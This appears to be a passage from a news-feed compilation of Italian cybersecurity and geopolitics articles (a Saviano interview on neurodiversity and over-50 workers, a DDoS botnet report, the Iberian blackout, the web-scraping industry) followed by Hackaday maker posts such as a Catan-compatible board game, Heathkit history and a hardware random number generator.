7- La tua associazione no-profit Ri-Creazione pone una particolare attenzione al gender gap e a categorie fragili, come over 50 e persone autistiche. Riguardo a quest’ultima categoria, molte persone nello spettro autistico mostrano caratteristiche che le rendono particolarmente predisposte a lavorare nella sicurezza informatica per skills come attenzione ai dettagli, abilità visuo-spaziali e capacità di concentrazione prolungata. Abbiamo avuto una lunga conversazione a riguardo: quali sono i superpoteri dell’autismo in attività di analisi, monitoraggio e individuazione di minacce? Puoi fornirmi anche uno scenario dell’ambiente lavorativo ideale?

Ri-Creazione riconosce il valore unico che le persone – in particolare quelle che ricadono nello spettro autistico – possono apportare al campo della sicurezza informatica. Le loro caratteristiche spesso includono:

• Attenzione ai dettagli, specie nell’individuare piccole incongruenze e anomalie.
• Una predisposizione per la comprensione di pattern visivi e la visualizzazione di dati complessi.
• Capacità di concentrazione prolungata.
• Una tendenza ad un approccio sistematico e razionale alla risoluzione dei problemi.
• Minore suscettibilità all’ingegneria sociale “tradizionale”, proprio grazie alla loro divergenza.

L’ambiente lavorativo ideale per le persone autistiche nella sicurezza informatica dovrebbe essere strutturato e prevedibile, nel senso che i compiti devono essere chiaramente definiti e inseriti in routine stabili. È necessaria una comunicazione chiara e diretta, priva di qualsiasi ambiguità e corredata da istruzioni precise, meglio se specializzate su aree specifiche in cui le loro abilità sono particolarmente utili. Ma anche l’aspetto emotivo deve essere abilitante: l’ambiente deve riconoscere e valorizzare le loro peculiarità, fornendo il supporto necessario per affrontare eventuali difficoltà sociali o sensoriali, ma anche riconoscendo e premiando il loro contributo unico e la loro expertise tecnica.

Se un ambiente di questo tipo permette alle persone autistiche di esprimere al meglio il proprio potenziale, ne beneficiano anche le persone neurotipiche, nonché tutti i colleghi che sono neurodivergenti senza rendersene conto o senza una diagnosi formale.

8 – Mi piace la parola superpotere che usi relazionato ai concetti di diversità come risorsa e forza e alle capacità uniche di ogni individuo. E’ proprio questo che secondo Ri-Creazione crea opportunità? Inoltre gli over 50 nel nostro paese sono difficili da ricollocare, nonostante il valore che l’esperienza porta. Che cosa significa davvero l’esperienza nell’ambito lavorativo e in quello della sicurezza informatica?

Spesso, quando parlo di opportunità per gli over 50, mi rifaccio a un aforisma di Jack Ma, il visionario fondatore cinese di Alibaba, colosso dell’e-commerce che ha rivoluzionato il commercio online a livello mondiale: «Prima dei 20 anni sii un bravo studente. Prima dei 30 anni acquisisci un po’ di esperienza. Tra i 30 e i 40 anni, lavora per te stesso se vuoi davvero essere un imprenditore. Tra i 40 e i 50 anni, concentrati sulle cose in cui sei bravo. Tra i 50 e i 60 anni, dedica il tuo tempo a far crescere i giovani. Quando hai più di 60 anni, goditi il tuo tempo.»

È un vero peccato che nel nostro paese gli over 50 incontrino spesso difficoltà nella ricollocazione, nonostante il grande valore che la loro esperienza può portare. Nell’ambito lavorativo in generale, e in quello della sicurezza informatica in particolare, l’esperienza significa:

• Conoscenza pratica, in particolare la comprensione e la dimestichezza con le dinamiche e i processi aziendali.
• Capacità di problem solving dettata dall’esperienza nell’affrontare situazioni complesse con maggiore efficacia, attingendo ad un repertorio di soluzioni già testate, a casa come in ufficio. Inoltre, già trovarsi in una situazione precaria dopo i 50 anni è un problema sfidante!
• Consapevolezza dei rischi di chi ha già vissuto diverse sfide e incidenti, nella vita personale come in quella professionale.
• Mentorship e guida per i colleghi più giovani, trasmettendo il loro know-how e contribuendo alla crescita del team. Banalmente, è lo scopo sotteso dietro i miei libri e lo scopo sociale di Ri-Creazione: condividere la conoscenza ed esperienza.
• L’esperienza può contribuire a una visione più ampia e strategica della sicurezza, andando oltre gli aspetti puramente tecnici.
• Aver superato sfide lavorative in passato porta una maggiore resilienza e capacità di affrontare momenti difficili.

Nonostante il valore innegabile dell’esperienza, spesso le aziende si concentrano troppo sulle competenze tecniche più recenti, sottovalutando la saggezza e la prospettiva che i professionisti over 50 possono offrire. Nel settore della sicurezza, tra un anno la tecnologia di oggi potrebbe essere vecchia: mi sono già espresso a proposito della curiosità.

9 – La relazione tra vulnerabilità umane e vulnerabilità software/hardware è strettamente interconnessa e rappresenta un aspetto cruciale nella sicurezza informatica. Su questo voglio fare una provocazione: Norbert Wiener, matematico e statistico statunitense, considerato il fondatore della cibernetica, la scienza che studia i processi di controllo e comunicazione negli esseri viventi e nelle macchine ha affermato: “la questione non è più quella della macchine che funzionano come organismi o di organismi che funzionano come macchine. Piuttosto, la macchina e l’organismo devono essere considerati come due stadi o stati funzionalmente equivalenti di organizzazione cibernetica”. Cosa ne pensi, puoi darmi una tua visione?

Norbert Wiener illumina un aspetto fondamentale della sicurezza informatica, ovvero l’interconnessione tra vulnerabilità umane e vulnerabilità software/hardware: entrambe persone e macchine sono soggette a “errori” o “malfunzionamenti”, che nel contesto della sicurezza si traducono in vulnerabilità. Abbiamo detto che i criminali possono sfruttare le vulnerabilità delle tecnologie e, ancora meglio, le vulnerabilità delle persone: gli hacker semplicemente scelgono la strada più comoda… In quest’ottica, tutte le vulnerabilità rappresentano un aspetto fondamentale della sicurezza informatica, sia dal lato di chi attacca, sia dal lato di chi si difende.

Le vulnerabilità software/hardware sono il risultato di errori di progettazione, implementazione o configurazione nelle macchine, mentre le vulnerabilità umane derivano dai limiti cognitivi, dai bias, dalle emozioni e dalla suscettibilità alla manipolazione degli esseri umani. Se è possibile mitigare le vulnerabilità tecnologiche, lo stesso si può fare con le vulnerabilità umane?

Alla provocazione di Wiener, rilancio con una contro-provocazione: se in ambito tecnologico si parla spesso di Ingegneria Informatica, Ingegneria del Software, Ingegneria Elettronica, forse è arrivato il momento di rendere materia di studio anche l’Ingegneria Sociale.

In conclusione, vorrei condividere l’iniziativa sociale che ha preso forma grazie a tutti coloro che hanno partecipato ai corsi e alle iniziative di Ri-Creazione, alle loro famiglie e ai tanti fragili che sono in attesa di una risposta concreta alla propria situazione.

Ri-Creazione sta sviluppando un nuovo modello di protezione digitale che va oltre la semplice formazione. Stiamo creando un ecosistema di supporto che integra competenze tecniche e sensibilità sociale, con tecnologie ergonomiche che sono state pensate specificamente per abilitare ai lavori cyber chi si trova in situazioni di vulnerabilità.

La nostra visione è quella di un “scudo digitale comunitario” che protegga le infrastrutture e le persone, con particolare attenzione a chi ha meno risorse o competenze per formarsi alla cybersicurezza e per difendersi autonomamente. Non si tratta semplicemente di offrire servizi, ma di costruire una rete di protezione sociale attraverso una tecnologia al servizio dell’inclusione: la forza di questo modello risiede proprio nel suo DNA no-profit che mette al centro la persona prima della tecnologia.

È un progetto che nasce dalla Scienza, dall’Esperienza e dal Cybercognitivismo. Per chi condivide questa visione e desidera contribuire a un futuro digitale più sicuro e inclusivo, vi invito a visitare il sito di Ri-Creazione per scoprire come sostenere concretamente questa iniziativa sociale. Insieme possiamo fare la differenza per chi oggi è più esposto ai rischi del mondo digitale.

L'articolo Cybercognitivismo, intervista a Fabrizio Saviano: da inclusione digitale a vantaggio universale proviene da il blog della sicurezza informatica.

Gli specialisti di Curator (ex Qrator Labs) hanno preparato un rapporto per il primo trimestre di quest’anno. Il numero totale di attacchi è aumentato del 110% rispetto al primo trimestre del 2024 e gli esperti hanno anche scoperto una gigantesca botnet DDoS composta da 1,33 milioni di dispositivi.

Il forte aumento degli attacchi segue un aumento del 50% degli attacchi DDoS nel 2024, confermando la tendenza all’aumento degli incidenti, hanno affermato i ricercatori. Allo stesso tempo, la società esclude dalle sue statistiche gli incidenti con un’intensità inferiore a 1 Gbps dall’inizio dell’anno scorso.

La maggior parte degli attacchi DDoS ai livelli di trasporto e di rete (L3-L4) erano diretti ai settori IT e telecomunicazioni (26,8%), fintech (22,3%) ed e-commerce. (21,5%). In totale, questi tre segmenti hanno rappresentato il 70% di tutti gli attacchi L3-L4 nel primo trimestre.

In termini di intensità, i valori di picco degli attacchi L3–L4 sono stati di soli 232 Gbps e 65 Mpps, significativamente inferiori ai record dell’anno scorso di 1140 Gbps e 179 Mpps. Tuttavia, secondo l’azienda, non ha senso parlare di una diminuzione dell’intensità degli attacchi: i valori mediani del bitrate e della velocità di trasmissione dei pacchetti superano notevolmente i livelli dell’anno scorso.

Anche per quanto riguarda la durata degli attacchi, il primo trimestre del 2025 si preannuncia piuttosto modesto. Ad esempio, l’incidente DDoS più lungo del trimestre è durato solo circa 9,6 ore. Si è trattato di un’ondata di UDP su un’organizzazione del microsegmento Petrolio e Gas.

La durata media degli attacchi è scesa da 71,7 minuti dell’anno scorso a 11,5 minuti nel primo trimestre del 2025. E il valore mediano è sceso da 150 a 90 secondi.

Inoltre, i ricercatori hanno segnalato la scoperta di un’enorme botnet DDoS composta da 1,33 milioni di dispositivi. A titolo di paragone, si tratta di una cifra quasi sei volte superiore a quella della più grande botnet DDoS del 2024 (227.000 dispositivi) e quasi 10 volte superiore a quella della più grande botnet del 2023 (136.000 dispositivi).

L’attacco della botnet DDoS scoperta era diretto a un’organizzazione del micro-segmento “Bookmakers online” ed è durato circa 2,5 ore.

Si dice che la botnet sia composta principalmente da dispositivi ubicati in Brasile (51,1%), Argentina (6,1%), Russia (4,6%), Iraq (3,2%) e Messico (2,4%).

Si nota che la composizione di questa botnet assomiglia alla botnet più grande scoperta l’anno scorso, il che rientra nella tendenza di cui hanno parlato i ricercatori nel rapporto finale per il 2024: la creazione di botnet DDoS di grandissime dimensioni da dispositivi nei paesi in via di sviluppo sta guadagnando slancio.

Gli analisti attribuiscono questo fenomeno alla lentezza nella sostituzione dei dispositivi più vecchi che non ricevono più aggiornamenti, abbinata ai continui miglioramenti nella qualità della connessione. Per ragioni economiche, questi effetti sono particolarmente pronunciati nei paesi in via di sviluppo. Di conseguenza, un numero enorme di dispositivi vulnerabili connessi a Internet ad alta velocità crea le condizioni ideali per la formazione di grandi botnet, utilizzate per potenti attacchi DDoS.

L'articolo Boom di attacchi DDoS: scoperta una mega botnet da 1,33 milioni di dispositivi proviene da il blog della sicurezza informatica.

Il maxi-blackout che ieri ha paralizzato per ore Spagna e Portogallo ha impressionato l’Europa intera e messo sotto stress non solo la capacità di reazione dei governi di Madrid e Lisbona, chiamati a gestire in condizioni d’incertezza i Paesi mentre le infrastrutture apparivano estremamente rallentate dall’interruzione dell’energia elettrica, ma anche l’elaborazione politica delle autorità di altri Paesi. Il blackout iberico mostra la necessità di sviluppare capacità di gestione delle infrastrutture critiche in grado di garantire sicurezza e resilienza anche in condizioni d’incertezza e mostrano la vulnerabilità delle reti alle operazioni asimmetriche e di guerra ibrida oggi sempre al centro del dibattito degli strateghi.

Di questi temi parliamo con l’ingegner Giuseppe Lucci, collaboratore di ricerca dell’Osservatorio per la Sicurezza del Sistema Industriale Strategico Nazionale (OSSISNa) costituito in seno al Centro Italiano di Strategia e Intelligence (Cisint) e specialista Grid Development di E-Distribuzione. Per OSSISNa e per Strategic Leadership Journal, la testata del Centro Altri Studi Difesa, Lucci ha di recente pubblicato interessanti studi sui temi di cui discute con InsideOver, centrali per la sicurezza strategica delle economie più avanzate in un’epoca incerta.

Cosa ci insegna la crisi del blackout iberico in materia di sicurezza e resilienza delle infrastrutture elettriche critiche?

“Il recente blackout che ha colpito la Penisola Iberica ci offre importanti spunti di riflessione sulla vulnerabilità dei nostri sistemi energetici, pur ricordando che le cause precise dell’evento non sono ancora state accertate. Osservando quanto accaduto, possiamo comunque trarre alcune considerazioni preliminari che meritano attenzione. Innanzitutto, l’isolamento energetico di Spagna e Portogallo si è rivelato un fattore critico. Questi Paesi, pur disponendo di capacità produttiva propria, quando si sono trovati in difficoltà non hanno potuto contare su sufficienti interconnessioni con il resto d’Europa. È come se vivessero in una casa ben riscaldata ma con pochissime porte e finestre: al primo problema interno, le vie d’uscita sono limitate. Inoltre, le reti di trasmissione ad alta tensione hanno mostrato la loro centralità strategica. Un sistema elettrico è forte quanto il suo anello più debole, e bastano criticità su poche linee principali per innescare effetti a catena su territori vastissimi. Immaginate un sistema stradale dove, bloccate poche autostrade chiave, tutto il traffico si paralizza senza alternative percorribili”.

Nelle crisi urge la possibilità di agire in maniera rapida e coordinata…

“Durante la crisi, la velocità di reazione e il coordinamento tra operatori si sono rivelati determinanti. Come in una squadra di emergenza ben addestrata, la capacità di agire rapidamente e in modo sincronizzato ha fatto la differenza, sebbene siano emerse anche difficoltà nel prendere decisioni tempestive in assenza di scenari preimpostati. Un altro aspetto emerso riguarda la nostra crescente dipendenza dai sistemi digitali per il controllo delle reti elettriche. Questi strumenti, fondamentali per la gestione quotidiana, potrebbero trasformarsi in punti di vulnerabilità in situazioni critiche, sia per malfunzionamenti tecnici che per possibili attacchi informatici”.

La generazione energetica di Spagna e Portogallo è fortemente basata sulle fondi rinnovabili. Che riflessioni impone questo dato di fatto?

“L’alta percentuale di energia rinnovabile nel mix iberico solleva interrogativi sulla gestione di queste fonti intermittenti in situazioni di emergenza. La transizione verde, pur necessaria, richiede adeguati sistemi di accumulo e backup per garantire stabilità anche nei momenti critici. Il blackout iberico ci ricorda che la resilienza energetica non si misura solo in megawatt disponibili, ma nella robustezza dell’intero ecosistema: qualità delle reti, prontezza operativa, integrazione sicura delle rinnovabili e capacità di risposta alle emergenze. È un campanello d’allarme per tutta l’Europa: anche sistemi apparentemente solidi possono rivelare fragilità inaspettate quando sottoposti a stress. Mentre aspettiamo di conoscere le cause precise dell’incidente, questa crisi ci invita già a ripensare i nostri paradigmi di sicurezza energetica con uno sguardo più integrato e previdente”.

In che misura questo problema è proprio del sistema di Spagna e Portogallo e quanto invece è potenzialmente estendibile anche al resto dell’Europa occidentale?

“La Penisola Iberica si trova attualmente in una condizione particolare di limitata integrazione energetica con il resto dell’Europa, una situazione che merita un’analisi approfondita. Spagna e Portogallo presentano una capacità di interconnessione con la rete elettrica continentale significativamente inferiore rispetto agli obiettivi stabiliti dall’Unione Europea, circostanza che comporta ripercussioni sia in termini di sicurezza energetica che di efficienza economica. La conformazione geografica, con i Pirenei che costituiscono una barriera naturale, rappresenta un fattore oggettivo che ha limitato lo sviluppo di adeguate infrastrutture di connessione con la Francia. Questo aspetto, unito alla notevole penetrazione di energie rinnovabili non programmabili nel mix energetico iberico, genera una situazione in cui la gestione dei flussi energetici risulta particolarmente complessa, con conseguenti differenziali di prezzo rispetto al mercato continentale”.

Il problema è esclusivamente iberico o ci sono altri casi simili?

“È opportuno considerare come alcune di queste problematiche, sebbene con intensità differente, si manifestino anche in altre aree dell’Europa occidentale. Le reti di trasmissione di diversi Paesi europei mostrano crescenti segni di congestione, mentre l’evoluzione del panorama produttivo legato alla transizione energetica sta introducendo nuove sfide infrastrutturali. Regioni come l’Italia meridionale e insulare, così come l’Irlanda, presentano già situazioni di parziale isolamento energetico su scala regionale. La questione iberica può pertanto essere interpretata come un caso di studio rilevante per comprendere le potenziali criticità che potrebbero interessare altre aree europee qualora lo sviluppo delle infrastrutture di rete non procedesse di pari passo con la trasformazione del mix energetico. Il fenomeno suggerisce l’importanza di un approccio coordinato a livello continentale per garantire un’efficace integrazione dei mercati energetici europei, requisito essenziale per il successo della transizione verso un sistema energetico più sostenibile”.

Le cause restano da chiarire. Non ci sono prove della possibilità di un attacco ostile ma chiaramente casi del genere sarebbero le conseguenze di qualsiasi offensiva cybernetica. Chi studia operazioni di guerra asimmetrica contro le reti prende appunti da queste vulnerabilità?

“Il blackout che ha colpito la Penisola Iberica ci offre uno spaccato illuminante sulle fragilità dei nostri sistemi energetici moderni. Sebbene le cause precise dell’evento restino ancora da chiarire, ciò che emerge con evidenza è il potenziale che simili situazioni rappresentano per chi studia le operazioni di guerra asimmetrica. Immaginate le nostre reti elettriche come il sistema nervoso della società contemporanea. Un tempo robuste e relativamente semplici, oggi sono diventate incredibilmente sofisticate ma, paradossalmente, anche più vulnerabili. La digitalizzazione che le rende efficienti le trasforma simultaneamente in bersagli ideali per attori che cercano di colpire un avversario “di lato” anziché frontalmente”.

Perché le reti elettriche attirano così tanto l’attenzione degli strateghi militari non convenzionali?

“La risposta è nella loro architettura interconnessa. Un sistema elettrico moderno funziona come un delicato gioco di equilibri: quando questa armonia viene disturbata in punti strategici, l’effetto può propagarsi come onde in uno stagno, amplificandosi ben oltre il punto d’impatto iniziale. Gli esperti che analizzano questi scenari non sono necessariamente interessati alla distruzione fisica delle infrastrutture. Ciò che studiamo nel rapporto OSSISNa 2025 è la possibilità di provocare una “disfunzione sistemica” – un’incapacità temporanea ma estesa del sistema di svolgere le sue funzioni essenziali. Il caos sociale che ne consegue e la pressione politica sui governi possono ottenere risultati strategici significativi senza sparare un colpo”.

Quali sono i profili di minaccia da osservare con maggiore attenzione?

“Particolarmente preoccupante è la nuova frontiera delle vulnerabilità digitali. I sistemi di controllo computerizzati che gestiscono le reti elettriche sono come porte che, se forzate, permettono di manipolare l’intero edificio energetico. Un singolo malware ben posizionato può compromettere centri nevralgici di distribuzione o sistemi di monitoraggio remoto. Non serve più abbattere fisicamente i tralicci quando si può “sussurrare” istruzioni dannose ai computer che li controllano. Ciò che rende questi scenari ancora più inquietanti è l’effetto domino che può scaturirne. Il blackout iberico, qualunque ne sia la causa, ha mostrato come un problema inizialmente circoscritto possa propagarsi attraverso reti insufficientemente compartimentate. Per uno stratega di guerra asimmetrica, questa è una leva formidabile: investire risorse limitate per ottenere effetti sproporzionati”.

Quali sono le principali lezioni da trarre da questa situazione?

“La lezione più importante che possiamo trarre da questa vicenda è che la resilienza energetica è ormai una questione di sicurezza nazionale, non solo di efficienza tecnica. Le moderne strategie di conflitto non mirano necessariamente alla distruzione, ma alla destabilizzazione attraverso la disarticolare dei servizi essenziali. Mentre attendiamo di comprendere le reali cause del blackout iberico, una cosa è certa: gli strateghi di guerra asimmetrica stanno prendendo appunti, e le nostre società farebbero bene a fare lo stesso, ripensando profondamente come proteggere le arterie energetiche da cui dipende la nostra vita quotidiana”.

L'articolo Giuseppe Lucci: “Le lezioni sulla sicurezza dal black out in Spagna e Portogallo” proviene da InsideOver.

HOWDY GANG. THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be in Brussels this week to interview Microsoft's president Brad Smith. You can watch along here on April 30, or put your name down here for one of the final in-person spots.

In other news, I was also just appointed as a member of an independent committee at the United Kingdom's Ofcom regulator to advise on issues related to the online information environment. More on that here.

— Canadians go to the polls on April 28 amid a barrage of online falsehoods. That won't stop Liberal leader Mark Carney almost certainly winning.

— There's a lot of politics to unpack behind the European Union's collective $790 million antitrust fine against Meta and Apple related to the bloc's new competition rules.

— Brussels spent $52 million in 2024 to implement its online safety regime. Those figures will rise by more than a quarter this year.

Let's get started:

digitalpolitics.co/newsletter0…

L’affare in chiaroscuro di “rastrellare” il web

Lo “scraping” dei dati è sempre più funzionale alle aziende: si sta sviluppando una miriade di società dedicate a questi servizi. Che si muovono sul labile confine con il diritto alla privacy e la tutela intellettuale

di Alessandro Longo per La Repubblica del 28 Aprile 2025

La polemica sui presunti numeri di Meloni e Mattarella in vendita online ha tolto il velo su un mercato sconosciuto ai più, dove il lecito e l’illecito si confondono: il business del “web scraping”. Letteralmente, è il “rastrellamento” del web fatto in automatico, con software, per ottenere masse di dati. Utilizzabili per vari motivi, dal telemarketing alle analisi finanziarie, o commerciali. Un mercato miliardario, abitato anche da aziende normali e persino giganti come Amazon e grandi banche. Vale 1,01 miliardi di dollari, nel mondo (nel 2024, secondo il report State of web scraping di Scrapeops, di gennaio scorso). E cresce al ritmo del 10-20 per cento all’anno. Questa è, certo, la parte illuminata – legale, in linea di massima – del web scraping. C’è anche una parte oscura, fatta da chi vende dati di terza mano, di dubbia origine, forse frutto di hacking, nella migliore delle ipotesi, rastrellati violando la privacy o la proprietà intellettuali degli interessati.

l’industria del web scraping affari in forte crescita

Le indagini del Garante

Sull’ultimo caso italiano non ci sono ancora certezze, bisognerà vedere l’esito delle indagini delle autorità, tra cui il Garante Privacy. Com’è noto, alcune società americane hanno messo in vendita presunti contatti di cariche dello Stato italiano e altri soggetti istituzionali. Si è appreso poi che alcuni erano numeri pubblici sul web, per esempio nei curriculum o nei social di alcuni funzionari pubblici. E quindi la vendita è un illecito privacy per le regole europee, ma non per quelle Usa. Altri sono invece numeri fasulli: quelli attribuiti alla premier Giorgia Meloni e del presidente Sergio Mattarella sembrano appartenere in realtà a loro ex portavoce, confermano vari esperti di intelligence (come Antonio Teti, autore di molti libri sul tema, e Alessio Pennasilico, del Clusit, l’associazione della cybersecurity italiana). In fondo, anche questo episodio conferma quanto questo business viva di chiaro-oscuri. Anche la sua stessa filiera “legale” è complessa e strisciante.

Immaginiamo un’azienda interessata a ottenere dati strategici dal web. Può essere un e-commerce che vuole fare analisi sui prezzi o una società finanziaria che vuole catturare sentiment di mercato. L’azienda si affida a una piattaforma specializzata come Zyte o Apify, che offrono soluzioni “chiavi in mano” per automatizzare la raccolta dei dati. Programmano software che simulano la navigazione umana: visitano i siti, individuano le informazioni rilevanti e le salvano in formati strutturati pronti per essere analizzati.

Le misure anti-scraping e i trucchi per aggirarli

Ma non basta. Ad esempio: lo scopo di un’azienda è raccogliere i dati sui prezzi dei voli per individuare il momento migliore quando comprare i biglietti, da rivendere al cliente finale. Il problema: i siti delle compagnie aeree applicano misure anti-scraping, con diversi strumenti tecnici. Per aggirarli, la piattaforma di scraping si appoggia a un altro attore fondamentale della filiera: il fornitore di proxy. Aziende come Bright Data, Oxylabs o Smartproxy mettono a disposizione una rete globale di indirizzi ip residenziali e mobili, che permettono al sistema di scraping di inviare richieste “mascherate” come se provenissero da utenti reali, distribuiti in vari paesi. In questo modo, si evita che i siti web blocchino il traffico o lo considerino sospetto. A questo punto, i dati raccolti possono essere semplicemente consegnati al cliente, oppure — in una fase successiva — arricchiti con ulteriori dati da altre fonti tramite soggetti aggregatori come Explorium o SafeGraph. Questi vendono dati raccolti da terzi, tramite api (interfacce verso i sistemi dei clienti) o dashboard (cruscotti) personalizzati.

Come si vede, lo scraping è ben altra cosa rispetto alla vendita di dati trafugati tramite attacchi informatici. Il chiaroscuro resta, soprattutto in Europa: «Non si può fare web scraping lecito all’insaputa e senza autorizzazione del titolare del sito da cui si estraggono i dati. Le regole privacy tutelano i dati personali e quelle sulla proprietà intellettuale tutelano anche molti dati non personali», spiega l’avvocato Eugenio Prosperetti. «La recente Direttiva Copyright prevede solo pochissimi casi in cui è lecito anche senza autorizzazione, ossia quelli per ricavare dati ad uso didattico e di ricerca, con divieto assoluto di uso commerciale dei risultati», aggiunge. Il problema: «Per combattere lo scraping sul piano legale bisogna dimostrare che un dato è stato estratto dal proprio sito», continua. Complicato poi perseguire società extra-europee; quasi impossibile bloccare la rivendita del dato nel dark web. Così, in questo chiaroscuro confortevole, il mercato va avanti. E persino prospera, per la crescente fame di dati raffinati che c’è ormai propria di ogni business.

dicorinto.it/temi/privacy/laff…

[Sean Boyce] has been busy building board games. Specifically, an electronic strategy boardgame that is miraculously also compatible with Settlers of Catan.

[Sean’s] game is called Calculus. It’s about mining asteroids and bartering. You’re playing as a corporation attempting to mine the asteroid against up to three others doing the same. Do a good job of exploiting the space-based resource, and you’ll win the game.

Calculus is played on a board made out of PCBs. A Xiao RP2040 microcontroller board on the small PCB in the center of the playfield is responsible for running the show. It controls a whole ton of seven-segment displays and RGB LEDs across multiple PCBs that make up the gameboard. The lights and displays help players track the game state as they vie for asteroid mining supremacy. Amusingly, by virtue of its geometry and some smart design choices, you can also use [Sean]’s board to play Settlers of Catan. He’s even designed a smaller, cheaper travel version, too.

We do see some interesting board games around these parts, because hackers and makers are just that creative. If you’ve got your own board game hacks or builds in the works, don’t hesitate to let us know!

hackaday.com/2025/04/26/creati…

If you build electronics, you will eventually need a coil. If you spend any time winding one, you are almost guaranteed to think about building a coil winder. Maybe that’s why so many people do. [Jtacha] did a take on the project, and we were impressed — it looks great.

The device has a keypad and an LCD. You can enter a number of turns or the desired inductance. It also lets you wind at an angle. So it is suitable for RF coils, Tesla coils, or any other reason you need a coil.

There are a number of 3D printed parts, so this doesn’t look like an hour project. Luckily, none of the parts are too large. The main part is 2020 extrusion, and you will need to tap the ends of some of the pieces.

There is a brief and strangely dark video in the post if you want to see the machine in operation. The resulting coil looked good, especially if you compare it to how our hand-wound ones usually look.

While most of the coil winders we see have some type of motor, that’s not a necessity.

hackaday.com/2025/04/26/anothe…

The self-propelled zip fastener uses a worm gear to propel itself along the teeth. (Credit: YKK)
At first glance the very idea of a zipper that unzips and zips up by itself seems somewhat ridiculous. After all, these contraptions are mostly used on pieces of clothing and gear where handling a zipper isn’t really sped up by having an electric motor sluggishly move through the rows of interlocking teeth. Of course, that’s not the goal of YKK, which is the world’s largest manufacturer of zip fasteners. The demonstrated prototype (original PR in Japanese) shows this quite clearly, with a big tent and equally big zipper that you’d be hard pressed to zip up by hand.

The basic application is thus more in industrial applications and similar, with one of the videos, embedded below, showing a large ‘air tent’ being zipped up automatically after demonstrating why for a human worker this would be an arduous task. While this prototype appears to be externally powered, adding a battery or such could make it fully wireless and potentially a real timesaver when setting up large structures such as these. Assuming the battery isn’t flat, of course.

It might conceivably be possible to miniaturize this technology to the point where it’d ensure that no fly is ever left unzipped, and school kids can show off their new self-zipping jacket to their friends. This would of course have to come with serious safety considerations, as anyone who has ever had a bit of their flesh caught in a zipper can attest to.

youtube.com/embed/-v283Og5DLw?…

theverge.com/news/656535/ykk-s…

ykk.com/newsroom/g_news/2025/2…

hackaday.com/2025/04/26/ykks-s…

While most hams and hackers have at least heard of Heathkit, most people don’t know the strange origin story of the legendary company. [Ham Radio Gizmos] takes us all through the story.

In case you don’t remember, Heathkit produced everything from shortwave radios to color TVs to test equipment and even computers. But, for the most part, when you bought something from them, you didn’t get a finished product. You got a bag full of parts and truly amazing instructions about how to put them together. Why? Well, if you are reading Hackaday, you probably know why. But some people did it to learn more about electronics. Others were attracted by the lower prices you paid for some things if you built them yourself. Others just liked the challenge.

But Heathkit’s original kit wasn’t electronic at all. It was an airplane kit. Not a model airplane, it was an actual airplane. Edward Heath sold airplane kits at the affordable price around $1,000. In 1926, that was quite a bit of money, but apparently still less than a commercial airplane.

Sadly, Heath took off in a test plane in 1931, crashed, and died. The company struggled to survive until 1935, when Howard Anthony bought the company and moved it to the familiar Benton Harbor address. The company still made aircraft kits.

During World War II, the company mobilized to produce electronic parts for wartime aircraft. After the war, the government disposed of surplus, and Howard Anthony casually put in a low bid on some. He won the bid and was surprised to find out the lot took up five rail cars. Among the surplus were some five-inch CRTs used in radar equipment. This launched the first of Heathkit’s oscilloscopes — the O1. At $39.50, it was a scope people could afford, as long as they could build it. The O-series scopes would be staples in hobby workshops for many years.

There’s a lot more in the video. Well worth the twenty minutes. If you’ve never seen a Heathkit manual, definitely check out the one in the video. They were amazing. Or download a couple. No one creates instructions like this anymore.

If you watch the video, be warned, there will be a quiz, so pay attention. But here’s a hint: there’s no right answer for #3. We keep hearing that someone owns the Heathkit brand now, and there have been a few new products. But, at least so far, it hasn’t really been the same.

hackaday.com/2025/04/26/rememb…

Sometimes you need random numbers — and properly random ones, at that. [Sean Boyce] whipped up a rig that serves up just that, tasty random bytes delivered fresh over MQTT.

[Sean] tells us he’s been “designing various quantum TRNGs for nearly 15 years as part of an elaborate practical joke” without further explanation. We won’t query as to why, and just examine the project itself. The main source of randomness — entropy, if you will — is a pair of transistors hooked up to create a bunch of avalanche noise that is apparently truly random, much like the zener diode method.

In any case, the noise from the transistors is then passed through a bunch of hex inverters and other supporting parts to shape the noise into a nicely random square wave. This is sampled by an ATtiny261A acting as a Von Neumann extractor, which converts the wave into individual bits of lovely random entropy. These are read by a Pi Pico W, which then assembles random bytes and pushes them out over MQTT.

Did that sound like a lot? If you’re not in the habit of building random number generators, it probably did. Nevertheless, we’ve heard from [Sean] on this topic before. Feel free to share your theories on the best random number generator designs below, or send your best builds straight to the tipsline. Randomly, of course!

hackaday.com/2025/04/26/quantu…

It was probably Montesquieu who coined the proto-hacker motto “the best is the mortal enemy of the good”. He was talking about compromises in drafting national constitutions for nascent democracies, of course, but I’ll admit that I do hear his voice when I’m in get-it-done mode and start cutting corners on a project. A working project is better than a gold-plated one.

But what should I do, Monte, when good enough turns out to also be the mortal enemy of the best? I have a DIY coffee roaster that is limping along for years now on a blower box that uses a fan scavenged in anger from an old Dust Buster. Many months ago, I bought a speed-controllable and much snazzier brushless blower fan to replace it, that would solve a number of minor inconveniences with the current design, but which would also require some building and another dive into the crufty old firmware.

So far, I’ve had good enough luck that the roaster will break down from time to time, and I’ll use that as an excuse to fix that part of the system, and maybe even upgrade another as long as I have it apart. But for now, it’s running just fine. I mean, I have to turn the fan on manually, and the new one could be automatic. I have only one speed for the fan, and the new one would be variable. But the roaster roasts, and a constant source of coffee is mission critical in this house. The spice must flow!

Reflecting on this situation, it seems to me that the smart thing to do is work on smoothing the transitions from good enough to best. Like maybe I could prototype up the new fan box without taking the current one apart. Mock up some new driver code on the side while I’m at it?

Maybe Montesquieu was wrong, and the good and the best aren’t opposites after all. Maybe the good enough is just the first step on the path toward the best, and a wise man spends his energy on making the two meet in the middle, or making the transition from one to the other as painless as possible.

This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!

hackaday.com/2025/04/26/from-g…

In the 90s, a video game craze took over the youth of the world — but unlike today’s games that rely on powerful PCs or consoles, these were simple, standalone devices with monochrome screens, each home to a digital pet. Often clipped to a keychain, they could travel everywhere with their owner, which was ideal from the pet’s perspective since, like real animals, they needed attention around the clock. [ViciousSquid] is updating this 90s idea for the 20s with a digital pet squid that uses a neural network to shape its behavior.

The neural network that controls the squid’s behavior takes a large number of variables into account, including whether or not it’s hungry or sleepy, or if it sees food. The neural network adapts as different conditions are encountered, allowing the squid to make decisions and strengthen its algorithms. [ViciousSquid] is using a Hebbian learning algorithm which strengthens connections between neurons which activate often together. Additionally, the squid’s can form both short- and long-term memories, and the neural network can even form new neurons on its own as needed.
